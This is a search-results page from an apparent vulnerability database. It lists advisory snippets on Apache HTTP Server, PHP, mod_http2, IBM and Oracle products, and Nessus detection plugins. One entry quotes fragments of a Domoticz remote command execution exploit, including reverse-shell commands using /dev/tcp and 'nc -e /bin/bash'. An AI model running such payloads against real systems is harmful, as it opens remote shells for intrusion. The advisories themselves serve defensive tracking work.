11650 matches found
Denial Of Service (DoS) And Remote Code Execution (RCE)
PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. It was discovered that the PHP XSL extension did not restrict the file writing capability of libxslt. A remote attacker could use this flaw to create or overwrite an arbitrary file that is writable by the user...
Denial Of Service (DoS)
PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. It was discovered that the PHP XSL extension did not restrict the file writing capability of libxslt. A remote attacker could use this flaw to create or overwrite an arbitrary file that is writable by the user...
Denial Of Service (DoS)
PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. It was discovered that the PHP XSL extension did not restrict the file writing capability of libxslt. A remote attacker could use this flaw to create or overwrite an arbitrary file that is writable by the user...
Arbitrary Code Execution
PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. It was discovered that the PHP XSL extension did not restrict the file writing capability of libxslt. A remote attacker could use this flaw to create or overwrite an arbitrary file that is writable by the user...
Domoticz 4.10577 - Unauthenticated Remote Command Execution Exploit
Exploit for multiple platform in category web applications !/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse...
EulerOS 2.0 SP3 : httpd (EulerOS-SA-2019-1294)
According to the version of the httpd packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - In Apache HTTP Server 2.4 release 2.4.37 and prior, modsession checks the session expiry time before decoding the session. This causes session expir...
EulerOS 2.0 SP5 : git (EulerOS-SA-2019-1291)
According to the version of the git packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - git: arbitrary code execution via .gitmodules CVE-2018-17456 Note that Tenable Network Security has extracted the preceding description block directly...
NGINX Unit HTTP Server Detection
Nessus was able to detect the NGINX Unit HTTP server by looking at the HTTP banner on the remote host. C Tenable Network Security, Inc. include"compat.inc"; if description scriptid124336; scriptversion"1.4"; scriptsetattributeattribute:"pluginmodificationdate", value:"2022/10/12";...
Amazon Linux 2 : mod_http2 (ALAS-2019-1197)
In Apache HTTP server versions 2.4.37 and prior, by sending request bodies in a slow loris way to plain resources, the h2 stream for that request unnecessarily occupied a server thread cleaning up that incoming data. This affects only HTTP/2 modhttp2 connections.CVE-2018-17189 C Tenable Network...
Security Bulletin: IBM Security SiteProtector System is affected by Apache HTTP Server vulnerabilities
Summary IBM Security SiteProtector System has addressed the following vulnerabilities in Apache HTTP Server. Vulnerability Details CVEID: CVE-2018-11759 DESCRIPTION: Apache Tomcat JK modjk Connector could allow a remote attacker to traverse directories on the system, caused by the improper handli...
Low: mod_http2
Issue Overview: In Apache HTTP server versions 2.4.37 and prior, by sending request bodies in a slow loris way to plain resources, the h2 stream for that request unnecessarily occupied a server thread cleaning up that incoming data. This affects only HTTP/2 modhttp2 connections.CVE-2018-17189...
The vulnerability of the Perl module of the Apache HTTP Server, related to the injection of code into the .htaccess file of the user, allows a hacker to execute arbitrary code.
The vulnerability of the Perl module used by the Apache HTTP Server is related to the injection of code into the .htaccess file of the user’s directory. Exploiting this vulnerability allows a remote attacker to execute arbitrary Perl code on behalf of the user, thereby executing Apache HTTP serve...
Security Bulletin: Multiple vulnerabilities in Apache HTTP Server affect IBM Cognos Business Intelligence
Summary This bulletin addresses several security vulnerabilities in Apache HTTP Server that are fixed in IBM Cognos Business Intelligence. Vulnerability Details CVEID: CVE-2016-0736 DESCRIPTION: Apache HTTPD could allow a remote attacker to obtain sensitive information, caused by an error in...
Security Bulletin: Apache HTTP Server vulnerability in IBM WebSphere Application Server shipped with IBM Tivoli Netcool Performance Manager ( CVE-2018-17199).
Summary Apache HTTP Server vulnerability has been identified in WebSphere Application Server. WebSphere Application Server is shipped with Tivoli Netcool Performance Manager. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulleti...
Security Bulletin: Multiple vulnerabilities in IBM HTTP Server used by WebSphere Application Server (CVE-2019-0211 CVE-2019-0220)
Summary There are multiple vulnerabilities in the IBM HTTP Server used by WebSphere Application Server. CVE-2019-0211 affects version 9 non-windows platforms only. Vulnerability Details CVEID: CVE-2019-0220 DESCRIPTION: Apache HTTP Server could provide weaker than expected security, caused by URL...
Apache: Privilege escalation
Background The Apache HTTP server is one of the most popular web servers on the Internet. Description A vulnerability was discovered in Apache with MPM event, worker, or prefork. Impact An attacker could escalate privileges. Workaround There is no known workaround at this time. Resolution All...
Oracle Primavera Unifier Multiple Vulnerabilities (Apr 2019 CPU)
According to its self-reported version number, the Oracle Primavera Unifier installation running on the remote web server is 16.x prior to 16.2.15.7 or 17.7.x prior to 17.12.10 or 18.x prior to 18.8.6. It is, therefore, affected by multiple vulnerabilities: - A deserialization vulnerability in...
Oracle Fusion Middleware Oracle HTTP Server (Apr 2019 CPU)
The version of Oracle HTTP Server installed on the remote host is affected by a stack-based buffer overflow as noted in the April 2019 CPU advisory. The condition exists in the included cURL library due to using unsigned math when preventing the overflow. An unauthenticated, remote attacker can...
openSUSE Security Update : apache2 (openSUSE-2019-1209)
This update for apache2 fixes the following issues : - CVE-2019-0211: A flaw in the Apache HTTP Server allowed less-privileged child processes or threads to execute arbitrary code with the privileges of the parent process. Attackers with control over CGI scripts or extension modules run by the...
CentOS 7 : mod_auth_mellon (CESA-2019:0766)
An update for modauthmellon is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability...